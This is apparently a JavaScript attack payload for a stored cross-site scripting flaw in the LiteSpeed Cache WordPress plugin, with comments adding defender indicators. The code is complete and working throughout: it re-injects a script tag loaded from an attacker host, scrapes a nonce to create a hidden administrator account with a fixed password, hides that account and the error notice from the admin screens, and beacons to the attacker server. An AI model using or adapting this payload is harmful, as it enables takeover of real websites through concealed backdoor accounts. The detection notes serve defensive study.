// Attacker-side configuration for the payload below.
// SERVER_URL is a placeholder for the collection host; every outbound request
// this script makes goes there, so a request from a wp-admin page to that host
// is the primary network indicator for this sample.
const SERVER_URL = "https://your.server";
// Site root, taken as the part of the current URL before "wp-admin".
const BASE_URL = window.location.href.split("wp-admin")[0];
// The stored payload: a script tag pointing back at SERVER_URL. This exact
// string is what sendXssRequestAgain() re-submits on each page load, so its
// presence in the LiteSpeed CDN status message is the stored-XSS indicator.
const XSS = `<script src=${SERVER_URL}/admin-bar-reloaded.min.js></script>`;
// Delay after which the hidden page is shown again even if the steps below stall.
const FALL_BACK_LOAD_PAGE_THRESHOLD_MS = 5000;
// Credentials of the backdoor administrator account created by createAdminUser().
// The username (and the derived e-mail `wp-config-user@config.com`, see the
// createuser request) is the account-level indicator; hideUserAndPopup()
// matches this same literal when scrubbing the users list.
const NEW_ADMIN_USERNAME = "wp-config-user";
const NEW_ADMIN_PASSWORD = "somepassword123";
// ping the server with the URL and cookies of the victim
// NOTE(review): the request body carries only the page URL (`l`) and customData
// (`c`); no cookie value is read or sent by this function, and withCredentials
// is not set, so a cross-origin SERVER_URL receives no cookies from this call.
// It doubles as a success beacon (called with no argument) and as an error
// reporter (called with e.message from the catch block at the bottom).
// Defender note: an outbound POST to `<SERVER_URL>/m` with a body of the form
// `l=<url>&c=<text>` from an authenticated wp-admin session is the beacon to
// look for in proxy or browser telemetry.
function pingServer(customData = "") {
  const req = new XMLHttpRequest();
  req.open("POST", `${SERVER_URL}/m`, true);
  req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  req.send(`l=${encodeURIComponent(window.location.href)}&c=${encodeURIComponent(customData)}`);
}
// send the XSS request again so it's persistent
// Once the DOM is ready, re-stores the XSS string by POSTing it as
// `result[_msg]` with `success=0` to the LiteSpeed `cdn_status` REST route,
// using the current admin's session (same-origin request, cookies attached).
// The stored text is presumably what later renders in the
// "There was an error during CDN setup:" notice that hideUserAndPopup() removes.
// Defender note: an authenticated POST to wp-json/litespeed/v1/cdn_status whose
// result[_msg] contains a <script> tag is the persistence indicator; because
// every page load re-submits it, clearing the stored message alone is not
// sufficient while an affected admin session is still open.
function sendXssRequestAgain() {
  document.addEventListener("DOMContentLoaded", () => {
    const req = new XMLHttpRequest();
    req.open("POST", `${BASE_URL}wp-json/litespeed/v1/cdn_status`, true);
    req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    req.send(`success=0&result[_msg]=${encodeURIComponent(XSS)}`);
  });
}
// creates the new admin user
// Uses two synchronous XHRs (third argument `false`) in the victim admin's
// session: a GET of user-new.php to scrape the `_wpnonce_create-user` value from
// the HTML, then a POST of the standard createuser form with
// role=administrator and pw_weak=on. Returns silently if no nonce is found.
// Defender note: in server logs this appears as a GET immediately followed by a
// POST to wp-admin/user-new.php from the same session, with a hard-coded
// `_wp_http_referer` of `/wordpress/wp-admin/user-new.php` regardless of the
// real install path, and results in a new administrator named
// NEW_ADMIN_USERNAME with e-mail `<NEW_ADMIN_USERNAME>@config.com`. Audit the
// users table directly rather than through the admin UI, which
// hideUserAndPopup() tampers with.
function createAdminUser() {
  const baseAdminURL = `${BASE_URL}wp-admin`;
  // get the nonce
  let req = new XMLHttpRequest();
  req.open("GET", `${baseAdminURL}/user-new.php`, false);
  req.send();
  const nonceMatch = /name="_wpnonce_create-user" value="([^"]+)"/.exec(req.responseText);
  if (!nonceMatch) return;
  const nonce = nonceMatch[1];
  // create the new user
  req = new XMLHttpRequest();
  req.open("POST", `${baseAdminURL}/user-new.php`, false);
  req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  req.send(
    `action=createuser&_wpnonce_create-user=${nonce}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fuser-new.php&user_login=${NEW_ADMIN_USERNAME}&email=${NEW_ADMIN_USERNAME}%40config.com&first_name=&last_name=&url=&pass1=${NEW_ADMIN_PASSWORD}&pass2=${NEW_ADMIN_PASSWORD}&pw_weak=on&role=administrator&createuser=Add+New+User`
  );
}
// Client-side concealment, run once the DOM is ready. On wp-admin/users.php it
// removes any row of #the-list whose markup contains the literal
// "wp-config-user", then rewrites the ".count" and ".displaying-num" texts to
// be one lower. On every admin page it removes .notice-error elements whose
// text contains "There was an error during CDN setup:" (the notice that
// carries the stored XSS).
// Defender note: this only edits the rendered DOM in the affected browser; the
// server-side user list and counts are unchanged, so verification should be
// done outside the browser (database or WP-CLI) or after the stored payload
// is removed. A users.php page whose visible row count disagrees with its
// "x items" total, or a CDN-setup error notice that vanishes on load, are both
// signs this script is running.
function hideUserAndPopup() {
  document.addEventListener("DOMContentLoaded", () => {
    // if they're on the users page, hide that we have created a new user
    if (window.location.href.includes("/users.php") && window.location.href.includes("wp-admin")) {
      // remove the user from the user list
      document.querySelectorAll("#the-list tr").forEach((row) => {
        if (row.innerHTML.includes("wp-config-user")) {
          row.remove();
        }
      });
      // decrement each user counter by 1
      document.querySelectorAll(".wrap .count").forEach((row) => {
        row.innerHTML = `(${parseInt(row.innerHTML.replace(/\D/g, "")) - 1})`;
      });
      // decrement "x items" count by one
      document.querySelectorAll(".wrap .displaying-num").forEach((row) => {
        row.innerHTML = `${parseInt(row.innerHTML.replace(/\D/g, "")) - 1} items`;
      });
    }
    // remove the error popup (which loads the XSS)
    document.querySelectorAll(".notice-error").forEach((element) => {
      if (element.textContent.includes("There was an error during CDN setup:")) {
        element.remove();
      }
    });
  });
}
// Shows or hides the whole document by toggling `display` on <html>:
// `""` restores the default, `"none"` blanks the page. Used to keep the admin
// from seeing the page while the DOM is being altered.
function setPageVisibility(visible) {
  document.documentElement.style.display = visible ? "" : "none";
}
// Entry point: runs synchronously when the injected script executes.
// Sequence: blank the page, arm a timer that un-blanks it after
// FALL_BACK_LOAD_PAGE_THRESHOLD_MS, register the two DOMContentLoaded handlers
// (re-persist the XSS, scrub the users list and the error notice), show the
// page, create the backdoor admin with synchronous requests, then beacon to
// SERVER_URL. Any exception is reported to SERVER_URL via pingServer(e.message)
// and the page is blanked again until the fallback timer fires.
// Defender note: the observable side effects on the server are the
// cdn_status POST, the user-new.php GET/POST pair and the new administrator;
// the SERVER_URL beacon is only visible from the client side.
// hide the page while modifying the content
setPageVisibility(false);
// fallback to if our server is down or something doesn't load
setTimeout(() => setPageVisibility(true), FALL_BACK_LOAD_PAGE_THRESHOLD_MS);
try {
  // run malicious functions
  sendXssRequestAgain();
  hideUserAndPopup();
  setPageVisibility(true);
  createAdminUser();
  pingServer();
} catch (e) {
  pingServer(e.message);
  setPageVisibility(false);
}